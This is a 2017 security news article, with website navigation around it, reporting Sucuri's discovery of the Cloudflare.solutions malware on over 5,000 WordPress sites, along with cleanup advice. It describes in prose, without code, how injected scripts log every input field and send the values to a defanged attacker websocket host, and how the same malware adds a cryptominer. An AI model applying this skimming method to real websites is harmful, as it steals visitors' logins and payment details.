• Hacking News
    • Leaks
    • WikiLeaks
    • Anonymous
  • Tech
    • Android
    • Apple News
    • BlackBerry
    • Google News
    • Microsoft
    • Motorola
    • Nokia
    • Samsung
    • 3D
  • Cyber Crime
    • Phishing Scam
  • How To
  • Cyber Events
    • Censorship
    • Cyber Attacks
  • Security
    • Malware
  • Surveillance
    • Drones
    • NSA
    • Privacy
  • Explore
    • Gaming
    • Science
    • Viral
HackRead
  • April 16th, 2021
  • Home
  • Advertise
  • Privacy Policy
  • Contact Us
HackRead
  • Hacking News
    • Leaks
    • WikiLeaks
    • Anonymous
  • Tech
    • Android
    • Apple News
    • BlackBerry
    • Google News
    • Microsoft
    • Motorola
    • Nokia
    • Samsung
    • 3D
  • Cyber Crime
    • Phishing Scam
  • How To
  • Cyber Events
    • Censorship
    • Cyber Attacks
  • Security
    • Malware
  • Surveillance
    • Drones
    • NSA
    • Privacy
  • Explore
    • Gaming
    • Science
    • Viral
  • Follow us
    • Facebook
    • Twitter
    • Linkedin
    • Youtube
Home
Security
Malware

More than 5,000 WordPress websites plagued with Keylogger

December 7th, 2017 Waqas Security, Malware 0 comments
More than 5,000 WordPress websites plagued with Keylogger
Share on FacebookShare on Twitter

WordPress is one of the most used platforms in the world with more than 75 million websites using its content management system (CMS), and that is good enough reason for hackers to target WordPress-based websites.

Old malware new capabilities

Recently, researchers at website security platform Sucuri discovered that 5,500 WordPress websites are infected with malware that was initially identified in April this year as Cloudflare.solutions. At that time, the malware had cryptomining capabilities, but now, it is equipped with keyloggers.

The malware works in such a way that it exploits functions.php file used by WordPress themes. It queues Cloudflare[.]solutions scripts and uses a fake CloudFlare domain in the URLs who loads a copy of a legitimate ReconnectingWebSocket library.

What has changed since April

Previously when researchers identified the fake domain; its homepage displayed the message “This Server is part of Cloudflare Distribution Network, ” but the new message claims “This server is part of an experimental science machine learning algorithms project.”

Another change identified by researchers is the cors.js script. Upon decoding, there is no outright suspicious code like those banner images in the previous version. However, the script loads Yandex.Metrika, Yandex’s alternative to Google Analytics.

Furthermore, Sucuri researchers found two fake CloudFlare domains, one of which contains long hexadecimal parameters. These domains might look legitimate, but one of those domains does not exist while the other one (cdnjs.cloudflare.com) delivers payloads that are hexadecimal numbers after the question mark in the URLs. Moreover, the script according to researchers decodes and injects the result into web pages making it a keylogger.

More than 5,000 WordPress website plagued with Keylogger

(Image Credit: Sucuri)

This script adds a handler to every input field on the websites to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field, wrote Sucuri’s malware researcher Denis Sinegubko.

What does this keylogger do

The keylogger is designed to steal login credentials from WordPress sites while its prime target is e-commerce platforms to steal customers banking and card payment details. In case the platform requires users to log in with their social media details, personal email address or any other sensitive and useful data, the keylogger will also steal and send them to the attackers. 

More than 5,000 WordPress website plagued with Keylogger

Websocket traffic on an infected login page (Image Credit: Sucuri)

The Cloudflare.solutions malware also injects websites with CoinHive cryptocurrency miner scripts that uses visitor’s CPU power to mine Monero digital coins. 

What WordPress site owners should do

Since the malicious code for this malware exists in the function.php file of the WordPress theme, users are advised by Suciri to “remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.” 

It is highly advised that WordPress site owners should check if their site is infected with Cloudflare.solutions malware and change all login credentials including username and password. In case you are looking for tips on how to secure your WordPress site from ongoing threats follow this link.

[fullsquaread][/fullsquaread]

  • Tags
  • CloudFlare
  • CoinHive
  • Cryptocurrency
  • hacking
  • internet
  • keylogger
  • Malware
  • Monero
  • Wordpress
Facebook Twitter LinkedIn Pinterest
Previous article Process Doppelgänging attack affects all Windows version & evades AV products
Next article Man who threw away $121m of Bitcoin wants to dig up landfill site
Waqas

Waqas

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Related Posts
2021 and Emerging Cybersecurity Threats

2021 and Emerging Cybersecurity Threats

Unpatched MS Exchange servers hit by cryptojacking malware

Unpatched MS Exchange servers hit by cryptojacking malware

Indian supply-chain giant Bizongo exposed 643GB of sensitive data

Indian supply-chain giant Bizongo exposed 643GB of sensitive data

Newsletter

Get the best stories straight into your inbox!



Don’t worry, we don’t spam

Latest Posts
1-click code execution vulnerabilities in popular software apps
News

1-click code execution vulnerabilities in popular software apps

2021 and Emerging Cybersecurity Threats
Security

2021 and Emerging Cybersecurity Threats

SolarWinds Hack - US officially Blames Russian Intel Agency Hackers
Cyber Crime

SolarWinds Hack - US officially Blames Russian Intel Agency Hackers

HACKREAD is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance and Hacking News with full-scale reviews on Social Media Platforms & Technology trends. Founded in 2011, HackRead is based in the United Kingdom.

Follow us